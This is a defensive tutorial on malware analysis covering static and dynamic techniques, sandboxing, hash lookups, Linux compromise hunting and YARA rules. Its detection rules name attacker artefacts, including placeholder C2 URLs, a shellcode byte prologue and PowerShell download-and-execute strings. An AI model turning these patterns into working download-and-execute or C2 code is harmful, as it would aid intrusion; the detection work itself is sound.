
Malware Analysis Basics

Malware analysis is the process of understanding what a malicious program does, how it works, and what indicators it leaves behind. This note covers static and dynamic analysis techniques, sandboxing, hash-based identification, YARA rules, and common indicators of compromise (IOCs).


STATIC ANALYSIS                    DYNAMIC ANALYSIS
─────────────────                  ────────────────────────────────
Examine the file without           Execute the sample in a controlled
executing it                       environment and observe behaviour

Techniques:                        Techniques:
  File type identification           Process monitoring
  Hash computation                   Network traffic capture
  String extraction                  Registry/file system changes
  Disassembly / decompilation        Memory inspection

Pros: Safe (no execution)          Pros: Reveals actual runtime behaviour
Cons: Obfuscation can hide         Cons: Sandbox evasion; detonation needed
      true behaviour

The first step: understand what you’re dealing with before touching it.

# Identify file type (don't trust the extension)
file suspicious.exe
# ELF 64-bit LSB executable...
# PE32 executable (GUI) Intel 80386...
# Zip archive data...
# Common magic bytes (file headers):
# MZ (4D 5A) → Windows PE executable
# \x7fELF (7F 45 4C 46) → Linux ELF binary
# PK (50 4B) → ZIP / Office documents (docx, xlsx are ZIPs)
# %PDF (25 50 44 46) → PDF file
# Check magic bytes manually
xxd suspicious.exe | head -3
# or
hexdump -C suspicious.exe | head -5
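
The same magic-byte check can be scripted when many files need triage. The following is a minimal sketch, assuming only the four signatures listed above; `identify_magic` and `identify_file` are hypothetical helper names, and a tool like `file` knows far more formats.

```python
import sys

# Signatures taken from the magic-byte list above (illustrative, not exhaustive).
MAGIC_SIGNATURES = [
    (b"MZ", "Windows PE executable"),
    (b"\x7fELF", "Linux ELF binary"),
    (b"PK", "ZIP archive (also docx/xlsx)"),
    (b"%PDF", "PDF file"),
]


def identify_magic(header: bytes) -> str:
    """Return a description for the first signature that prefixes the header."""
    for magic, description in MAGIC_SIGNATURES:
        if header.startswith(magic):
            return description
    return "unknown"


def identify_file(path: str) -> str:
    """Read only the first bytes of the file; the sample is never executed."""
    with open(path, "rb") as handle:
        return identify_magic(handle.read(8))


if __name__ == "__main__":
    for path in sys.argv[1:]:
        print(f"{path}: {identify_file(path)}")
```

Because only the header is read, a file renamed from `.exe` to `.jpg` is still reported as a PE executable.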

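Cryptographic hashes create a fingerprint for a file. Looking the hash up in a database of known samples can identify malware without further analysis, but only for byte-identical copies: changing a single byte produces a completely different hash.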

# Compute hashes
md5sum suspicious.exe # MD5 - fast; still used for identification (not integrity)
sha1sum suspicious.exe # SHA-1
sha256sum suspicious.exe # SHA-256 - primary standard for malware IOCs
# Save hash for reference
sha256sum suspicious.exe | awk '{print $1}' > sample.hash
cat sample.hash
# Look up hash on VirusTotal (CLI)
pip install vt-py
export VT_API_KEY="your_api_key_here"
python3 << 'EOF'
import os  # needed for os.environ below
import vt

HASH = "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f"
with vt.Client(os.environ["VT_API_KEY"]) as client:
    file = client.get_object(f"/files/{HASH}")
    print(f"Name: {file.meaningful_name}")
    print(f"Detection: {file.last_analysis_stats['malicious']}/{sum(file.last_analysis_stats.values())} engines")
    print(f"Family: {file.popular_threat_classification.get('suggested_threat_label', 'unknown')}")
EOF
# Or via curl
curl -s --request GET \
--url "https://www.virustotal.com/api/v3/files/$(sha256sum suspicious.exe | awk '{print $1}')" \
--header "x-apikey: $VT_API_KEY" | python3 -m json.tool | grep -E "malicious|type_description"
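
The three hashes can also be computed in one pass from Python, which is convenient inside a larger triage script. This is a small sketch using only the standard library; `hash_file` is a hypothetical helper name, and the chunk size is an arbitrary choice.

```python
import hashlib
import sys


def hash_file(path: str, chunk_size: int = 65536) -> dict:
    """Compute MD5, SHA-1 and SHA-256 in a single pass over the file."""
    digests = {name: hashlib.new(name) for name in ("md5", "sha1", "sha256")}
    with open(path, "rb") as handle:
        # Read in chunks so large samples do not have to fit in memory.
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            for digest in digests.values():
                digest.update(chunk)
    return {name: digest.hexdigest() for name, digest in digests.items()}


if __name__ == "__main__":
    for path in sys.argv[1:]:
        for name, value in hash_file(path).items():
            print(f"{name:7} {value}  {path}")
```

The SHA-256 value is the one to record as the IOC and to use for lookups.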

Strings embedded in binaries reveal intent - URLs, registry keys, file paths, error messages, commands.

# Extract all printable strings from a binary
strings suspicious.exe
# Filter for interesting patterns
strings suspicious.exe | grep -E "http[s]?://" # URLs
strings suspicious.exe | grep -iE "cmd|powershell|exec" # command execution
strings suspicious.exe | grep -iE "password|passwd|cred" # credential references
strings suspicious.exe | grep -E "HKCU|HKLM|Software" # Windows registry paths
strings suspicious.exe | grep -E "\.dll|LoadLibrary" # DLL loading
strings suspicious.exe | grep -E "CreateProcess|ShellExecute|WinExec" # process creation
# Unicode strings (wide strings - common in Windows malware)
strings -el suspicious.exe # 16-bit little-endian (UTF-16LE)
# Extract IPv4 addresses and email addresses
strings suspicious.exe | grep -E "[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}"
strings suspicious.exe | grep -E "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}"
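
For environments without the `strings` utility, the extraction can be approximated in Python. The sketch below is a rough stand-in, not a reimplementation of `strings`: it assumes a minimum run length of 4 printable characters, and `extract_strings` and `find_urls` are hypothetical helper names.

```python
import re

# Runs of 4+ printable ASCII bytes (similar in spirit to plain `strings`).
ASCII_RUN = re.compile(rb"[\x20-\x7e]{4,}")
# Runs of 4+ printable characters each followed by a NUL byte (UTF-16LE, like `strings -el`).
WIDE_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")
URL = re.compile(r"https?://[^\s\"'<>]+")


def extract_strings(data: bytes) -> list:
    """Return ASCII strings followed by UTF-16LE strings found in the data."""
    found = [m.group().decode("ascii") for m in ASCII_RUN.finditer(data)]
    found += [m.group().decode("utf-16-le") for m in WIDE_RUN.finditer(data)]
    return found


def find_urls(strings: list) -> list:
    """Filter extracted strings for http/https URLs."""
    return [url for text in strings for url in URL.findall(text)]


if __name__ == "__main__":
    import sys
    with open(sys.argv[1], "rb") as handle:
        for url in find_urls(extract_strings(handle.read())):
            print(url)
```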
# Install pefile (Python library)
pip install pefile
python3 << 'EOF'
import pefile

pe = pefile.PE("suspicious.exe")

# Basic info
print(f"Machine: {hex(pe.FILE_HEADER.Machine)}")  # 0x14c = x86, 0x8664 = x64
print(f"Timestamp: {pe.FILE_HEADER.TimeDateStamp}")
# Section names are NUL-padded to 8 bytes, so strip the padding explicitly
print(f"Sections: {[s.Name.decode(errors='replace').rstrip(chr(0)) for s in pe.sections]}")

# Check for suspicious section characteristics
for section in pe.sections:
    name = section.Name.decode(errors='replace').rstrip('\x00')
    print(f"Section: {name} | Entropy: {section.get_entropy():.2f} | RawSize: {section.SizeOfRawData}")
    # Entropy above ~7.0 suggests packed/encrypted content

# Imported DLLs and functions (reveal capability)
if hasattr(pe, 'DIRECTORY_ENTRY_IMPORT'):
    for entry in pe.DIRECTORY_ENTRY_IMPORT:
        print(f"  DLL: {entry.dll.decode()}")
        for imp in entry.imports:
            if imp.name:  # imports by ordinal have no name
                print(f"    {imp.name.decode()}")
EOF

Suspicious Windows API imports by category:

Category               Suspicious APIs
Process injection      VirtualAllocEx, WriteProcessMemory, CreateRemoteThread
Persistence            RegSetValueEx, CreateService, NetScheduleJobAdd
Network                InternetOpen, WSAConnect, URLDownloadToFile
File system            FindFirstFile, CopyFile, DeleteFile
Privilege escalation   AdjustTokenPrivileges, ImpersonateLoggedOnUser
Anti-analysis          IsDebuggerPresent, GetTickCount, QueryPerformanceCounter
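
A table like this can be turned into a quick lookup over a sample's import list. The sketch below assumes the import names have already been collected (for example with pefile) and uses a subset of the table; `categorize_imports` is a hypothetical helper, and the trailing `A`/`W` handling is a simplification of the ANSI/Unicode naming of Win32 exports.

```python
# Subset of the table above; extend as needed.
SUSPICIOUS_APIS = {
    "Process injection": {"VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread"},
    "Persistence": {"RegSetValueEx", "CreateService"},
    "Network": {"InternetOpen", "WSAConnect", "URLDownloadToFile"},
    "File system": {"FindFirstFile", "CopyFile", "DeleteFile"},
    "Privilege escalation": {"AdjustTokenPrivileges", "ImpersonateLoggedOnUser"},
    "Anti-analysis": {"IsDebuggerPresent", "GetTickCount", "QueryPerformanceCounter"},
}


def categorize_imports(imports: list) -> dict:
    """Group imported function names by the capability category they suggest."""
    hits = {}
    for name in imports:
        # Many Win32 functions are exported as NameA / NameW variants.
        candidates = {name}
        if name[-1:] in ("A", "W"):
            candidates.add(name[:-1])
        for category, apis in SUSPICIOUS_APIS.items():
            if candidates & apis:
                hits.setdefault(category, []).append(name)
    return hits


if __name__ == "__main__":
    sample_imports = ["VirtualAllocEx", "WriteProcessMemory", "RegSetValueExW", "ExitProcess"]
    for category, names in categorize_imports(sample_imports).items():
        print(f"{category}: {', '.join(names)}")
```

A hit is only a lead: many benign programs import these functions, so the combination of categories matters more than any single API.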

Packed or encrypted malware has high entropy (random-looking data):

# Check section entropy (above ~7.0 suggests packed/encrypted content)
python3 -c "
import pefile, math

def entropy(data):
    # Shannon entropy in bits per byte (0.0 to 8.0)
    if not data:
        return 0.0
    counts = {}
    for byte in data:
        counts[byte] = counts.get(byte, 0) + 1
    return -sum((c/len(data)) * math.log2(c/len(data)) for c in counts.values())

pe = pefile.PE('suspicious.exe')
for s in pe.sections:
    data = s.get_data()
    name = s.Name.decode(errors='replace').rstrip('\x00')
    print(f'{name:10} entropy={entropy(data):.2f}')
"

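To see why the threshold sits near the top of the scale, it helps to run the entropy formula on inputs with known structure. The sketch below is standalone (no pefile needed); `shannon_entropy` is a hypothetical helper that computes the same quantity as the snippet above, written as the sum of p * log2(1/p).

```python
import math
import os


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 (constant) up to 8.0 (uniform)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for byte in data:
        counts[byte] += 1
    total = len(data)
    return sum((c / total) * math.log2(total / c) for c in counts if c)


if __name__ == "__main__":
    samples = {
        "constant bytes": b"\x00" * 4096,
        "english text": b"the quick brown fox jumps over the lazy dog " * 100,
        "all byte values": bytes(range(256)) * 16,
        "random bytes": os.urandom(65536),
    }
    for label, data in samples.items():
        print(f"{label:16} entropy={shannon_entropy(data):.2f}")
```

Plain text and ordinary code sit well below the maximum, while compressed or encrypted data approaches 8 bits per byte, which is why a section near the top of the range stands out.
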
A sandbox executes malware in a controlled, isolated environment and records everything it does.

Service            Type          Notes
any.run            Interactive   Watch execution in real time; interact with the sample
VirusTotal         Automated     Runs 70+ AV engines + some sandbox analysis
Joe Sandbox        Automated     Detailed Windows/Linux/macOS analysis
Hybrid Analysis    Automated     Free; Falcon Intelligence sandbox
Triage (tria.ge)   Automated     Fast; API access; YARA matching
# Submit a sample via VirusTotal API (the file is sent as a multipart form field)
curl -s --request POST \
  --url "https://www.virustotal.com/api/v3/files" \
  --header "x-apikey: $VT_API_KEY" \
  --form "file=@suspicious.exe" \
  | python3 -m json.tool | grep -E '"id"|"type"'
# Get analysis results after a minute
ANALYSIS_ID="<id from above>"
curl -s --request GET \
--url "https://www.virustotal.com/api/v3/analyses/$ANALYSIS_ID" \
--header "x-apikey: $VT_API_KEY" \
| python3 -m json.tool | grep -E "status|malicious|harmless"
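
Grepping JSON works for a quick look, but a script usually wants the verdict as structured data. The sketch below assumes the analysis response nests its fields under `data.attributes` with a `status` string and a `stats` dictionary of per-verdict counts; the sample response is made up for illustration, and `summarize_analysis` is a hypothetical helper.

```python
def summarize_analysis(response: dict) -> str:
    """Summarize an analysis response; tolerate missing keys instead of raising."""
    attributes = response.get("data", {}).get("attributes", {})
    status = attributes.get("status", "unknown")
    if status != "completed":
        return f"status={status} (poll again later)"
    stats = attributes.get("stats", {})
    total = sum(stats.values())
    return f"status=completed malicious={stats.get('malicious', 0)}/{total}"


if __name__ == "__main__":
    # Illustrative response only; the counts are invented for this example.
    example = {
        "data": {
            "type": "analysis",
            "attributes": {
                "status": "completed",
                "stats": {"malicious": 12, "suspicious": 1, "harmless": 0, "undetected": 57},
            },
        }
    }
    print(summarize_analysis(example))
    print(summarize_analysis({"data": {"attributes": {"status": "queued"}}}))
```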
# Cuckoo Sandbox - self-hosted dynamic analysis platform
# (Runs malware in a VM; intercepts system calls and network traffic)
# Installation overview (simplified)
# Note: Cuckoo 2.x runs on Python 2.7 only, so install it into a Python 2.7 virtualenv
pip install cuckoo
cuckoo init
cuckoo community # download rules and signatures
# Configure a Windows 7 analysis VM in VirtualBox
# (Cuckoo agent must be installed in the VM)
# Submit a sample
cuckoo submit suspicious.exe
cuckoo submit --timeout 120 suspicious.exe # run for 2 minutes
# View results in web UI
cuckoo web runserver
# What Cuckoo captures:
# Process tree (parent-child relationships)
# System call trace (file, registry, network, process operations)
# Network traffic (PCAP)
# Screenshots (periodic)
# Memory dumps
# Extracted network IOCs (domains, IPs, URLs contacted)

IOCs are artifacts that signal a system has been compromised.

# 1. Unknown processes
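# Processes whose executable was deleted after launch (a common dropper trick)
ls -l /proc/[0-9]*/exe 2>/dev/null | grep '(deleted)'
# Review the full process list for unfamiliar names and odd parent-child chains: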
ps auxf # shows process tree (parent-child)
pstree -p # tree view with PIDs
# 2. Suspicious network connections (beaconing / C2 traffic)
ss -tulpan # all connections with processes
netstat -tulpan | grep ESTABLISHED | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -rn
# High frequency connections to same IP = possible beacon
# 3. Suspicious files in common locations
find /tmp /var/tmp /dev/shm -type f -executable 2>/dev/null
find /tmp -name "*.sh" -o -name "*.py" -o -name "*.pl" 2>/dev/null
find / -name ".*" -type f -newer /etc/passwd 2>/dev/null | head -20 # hidden files newer than passwd
# 4. Recently modified files in system directories
find /etc /usr/bin /usr/sbin -type f -mtime -7 2>/dev/null # modified in the last 7 days
# 5. Persistence mechanisms
# Crontabs
crontab -l 2>/dev/null
for user in $(cut -f1 -d: /etc/passwd); do crontab -u $user -l 2>/dev/null; done
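cat /etc/crontab /etc/cron.d/* /var/spool/cron/crontabs/* 2>/dev/null
ls -la /etc/cron.hourly /etc/cron.daily /etc/cron.weekly /etc/cron.monthly 2>/dev/null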
# Systemd units added by malware (review the list for unfamiliar service names)
systemctl list-units --type=service --state=running
find /etc/systemd /usr/lib/systemd ~/.config/systemd -name "*.service" 2>/dev/null | xargs ls -la
# Linux LD_PRELOAD injection (library hijack)
cat /etc/ld.so.preload 2>/dev/null # should be empty or not exist
# 6. Unusual user accounts
awk -F: '$3 == 0 && $1 != "root" { print "ROOT UID: "$1 }' /etc/passwd
awk -F: '$NF !~ /nologin|false/ && $3 >= 1000 { print $1 }' /etc/passwd
lastlog | grep -v "Never logged in" | tail -20
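
The account checks in step 6 are easy to reproduce offline, for example against a copy of `/etc/passwd` pulled from a disk image. The sketch below mirrors the two `awk` filters; `audit_passwd` is a hypothetical helper and the sample data is invented.

```python
def audit_passwd(passwd_text: str):
    """Return (extra UID-0 accounts, regular accounts with a login shell)."""
    extra_root, login_users = [], []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        # Skip comments and malformed lines rather than failing mid-triage.
        if line.startswith("#") or len(fields) < 7 or not fields[2].isdigit():
            continue
        name, uid, shell = fields[0], int(fields[2]), fields[6]
        if uid == 0 and name != "root":
            extra_root.append(name)
        if uid >= 1000 and "nologin" not in shell and "false" not in shell:
            login_users.append(name)
    return extra_root, login_users


if __name__ == "__main__":
    sample = (
        "root:x:0:0:root:/root:/bin/bash\n"
        "toor:x:0:0::/root:/bin/sh\n"
        "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
        "alice:x:1000:1000::/home/alice:/bin/bash\n"
        "svc:x:1001:1001::/home/svc:/bin/false\n"
    )
    extra_root, login_users = audit_passwd(sample)
    print("UID 0 besides root:", extra_root)
    print("Interactive accounts:", login_users)
```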
# Capture network traffic from a suspicious process
PID=$(pgrep -n suspicious) # -n = newest match; plain pgrep may return several PIDs
nsenter -t $PID -n tcpdump -i any -w /tmp/suspect-$PID.pcap &
# Look for beaconing patterns in a PCAP (count connections per destination; $5 is the destination field)
tcpdump -r capture.pcap -nn 'tcp' | awk '{print $5}' | cut -d. -f1-4 | sort | uniq -c | sort -rn | head
# DNS queries (potential C2 domain generation algorithms - DGA)
tcpdump -r capture.pcap -nn 'udp dst port 53' | grep -oE ' (A|AAAA)\? [^ ]+' | awk '{print $2}' | sort | uniq -c | sort -rn
# tshark - extract all contacted IPs
tshark -r capture.pcap -T fields -e ip.dst -q | sort | uniq -c | sort -rn | head -20
# Look for long DNS names (possible DNS tunneling or DGA)
tshark -r capture.pcap -T fields -e dns.qry.name -q \
| awk 'length($0) > 30' | sort | uniq -c | sort -rn
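
Connection counts alone miss the defining feature of a beacon, which is regular timing. One way to sketch this is to measure how much the gaps between connections to one destination vary. The code below assumes the timestamps (in seconds) have already been extracted from the capture; `beacon_score`, `looks_like_beacon`, and the 0.1 threshold are illustrative assumptions, and real beacons often add jitter that would need a looser threshold.

```python
from statistics import mean, pstdev


def beacon_score(timestamps: list):
    """Return (mean interval, coefficient of variation), or None if too few events."""
    if len(timestamps) < 4:
        return None
    ordered = sorted(timestamps)
    intervals = [later - earlier for earlier, later in zip(ordered, ordered[1:])]
    average = mean(intervals)
    if average == 0:
        return None
    # Low variation relative to the mean means evenly spaced connections.
    return average, pstdev(intervals) / average


def looks_like_beacon(timestamps: list, max_cv: float = 0.1) -> bool:
    """Flag a destination whose connection intervals are nearly constant."""
    score = beacon_score(timestamps)
    return score is not None and score[1] <= max_cv


if __name__ == "__main__":
    regular = [0, 60, 120, 180, 240, 300]      # one connection per minute
    irregular = [0, 5, 200, 210, 900]          # bursty, human-like traffic
    print("regular:", looks_like_beacon(regular))
    print("irregular:", looks_like_beacon(irregular))
```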

YARA is a pattern-matching language for malware identification. Each rule declares strings or byte patterns and combines them with a logical condition.

/* Basic YARA rule structure */
rule ExampleMalware {
    meta:
        description = "Detects Example malware C2 URLs"
        author = "[email protected]"
        date = "2025-03-11"
        reference = "https://threatintel.example.com/report/123"
        hash = "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f"
    strings:
        $url1 = "malicious-c2.ru/beacon" ascii
        $url2 = "evil-domain.cn/upload" ascii wide   // wide = UTF-16LE match
        $mutex = "Global\\MutexName123" ascii
        $pdb_path = "C:\\Users\\attacker\\malware.pdb" ascii
        // Hex byte pattern (x86: xor eax,eax; push eax; push imm32 - a common shellcode prologue)
        $shellcode = { 31 C0 50 68 }
        // Regex pattern
        $ip_regex = /\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/ ascii
    condition:
        uint16(0) == 0x5A4D and          // PE magic bytes "MZ"
        filesize < 2MB and
        any of ($url*) and               // any URL string matches
        $mutex and
        ($shellcode or $ip_regex) and    // every declared string must be referenced, or YARA rejects the rule
        not $pdb_path                    // exclude known samples
}
# Install YARA
apt install yara
# Write a rule and test it
cat > detect_poshell.yar << 'EOF'
rule PowerShellDownloader {
    strings:
        $ps1 = "powershell" nocase
        $dl1 = "DownloadString" nocase
        $dl2 = "Invoke-Expression" nocase
        $web = "WebClient" nocase
        $enc = "FromBase64String" nocase
    condition:
        3 of them
}
EOF
# Scan a file
yara -r detect_poshell.yar suspicious.exe
# Scan a directory recursively
yara -r detect_poshell.yar /tmp/samples/
# Scan memory of a running process (a numeric target is treated as a PID; -p sets the thread count instead)
yara detect_poshell.yar 1234
# Use community rules (from Awesome-YARA, ESET, Mandiant, etc.)
# Clone signature sets
git clone https://github.com/Neo23x0/signature-base.git
# Scan with multiple rule files
yara -r signature-base/yara/mal_*.yar /tmp/suspicious.exe
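
To make the `3 of them` condition concrete, the PowerShellDownloader rule can be emulated in a few lines of plain Python. This is only an illustration of the counting logic, not a substitute for YARA: it handles plain ASCII `nocase` strings and nothing else, and `matched_strings` and `rule_matches` are hypothetical names.

```python
# The five strings from the PowerShellDownloader rule above.
PATTERNS = {
    "$ps1": "powershell",
    "$dl1": "DownloadString",
    "$dl2": "Invoke-Expression",
    "$web": "WebClient",
    "$enc": "FromBase64String",
}


def matched_strings(data: bytes) -> list:
    """Return identifiers of patterns found anywhere in the data, ignoring case."""
    lowered = data.lower()  # emulates the `nocase` modifier for ASCII text
    return [name for name, text in PATTERNS.items() if text.lower().encode("ascii") in lowered]


def rule_matches(data: bytes, minimum: int = 3) -> bool:
    """Emulate `3 of them`: at least `minimum` distinct strings must be present."""
    return len(matched_strings(data)) >= minimum


if __name__ == "__main__":
    dropper = b"PowerShell -c (New-Object Net.WebClient).downloadstring('http://x.test/a')"
    benign = b"powershell Get-Date"
    print(matched_strings(dropper), rule_matches(dropper))
    print(matched_strings(benign), rule_matches(benign))
```

Requiring several weak indicators together is what keeps the rule from firing on every script that merely mentions PowerShell.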

1. SAFE ENVIRONMENT
   → Work in an isolated VM with no network access to production
   → Snapshot the VM before analysis; restore after
   → Use REMnux (remnux.org) - purpose-built Linux distro for analysis
2. IDENTIFY
   → Compute SHA-256 hash → check VirusTotal
   → file command, xxd for magic bytes
   → Check file entropy (packed/encrypted content is typically ~7.0+)
3. STATIC ANALYSIS
   → strings → filter for IPs, URLs, registry keys, commands
   → PE imports → identify capability categories
   → Disassemble: Ghidra (free) or IDA Pro (commercial)
4. DYNAMIC ANALYSIS
   → Submit to any.run or Hybrid Analysis
   → Or run in local Cuckoo sandbox
   → Capture: process tree, file/registry changes, network traffic
5. IOC EXTRACTION
   → Extract: file hashes, C2 IPs/domains, mutex names, registry keys
   → Encode in STIX format for sharing (TAXII is the transport protocol)
   → Write YARA rules for detection
6. REPORTING
   → Document: malware family, capabilities, C2 infrastructure
   → Share IOCs with your SIEM for blocking and alerting
   → Update EDR detection rules and blocklists
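
For the IOC extraction step, the sketch below shows roughly what a STIX 2.1 indicator looks like when built by hand. It is an illustration under assumptions: the output is not validated against the STIX schema, `make_indicator` and the `PATTERN_TEMPLATES` keys are hypothetical, and the domain is a placeholder. A real pipeline would more likely rely on a dedicated STIX library.

```python
import json
import uuid
from datetime import datetime, timezone

# STIX pattern templates for three common IOC types.
PATTERN_TEMPLATES = {
    "sha256": "[file:hashes.'SHA-256' = '{value}']",
    "domain": "[domain-name:value = '{value}']",
    "ipv4": "[ipv4-addr:value = '{value}']",
}


def make_indicator(kind: str, value: str, name: str) -> dict:
    """Build a minimal indicator object for one IOC."""
    now = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%S.000Z")
    return {
        "type": "indicator",
        "spec_version": "2.1",
        "id": f"indicator--{uuid.uuid4()}",
        "created": now,
        "modified": now,
        "valid_from": now,
        "name": name,
        "pattern_type": "stix",
        "pattern": PATTERN_TEMPLATES[kind].format(value=value),
    }


if __name__ == "__main__":
    iocs = [
        ("sha256", "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f", "Sample hash"),
        ("domain", "c2.example.test", "C2 domain (placeholder)"),
    ]
    bundle = {
        "type": "bundle",
        "id": f"bundle--{uuid.uuid4()}",
        "objects": [make_indicator(kind, value, name) for kind, value, name in iocs],
    }
    print(json.dumps(bundle, indent=2))
```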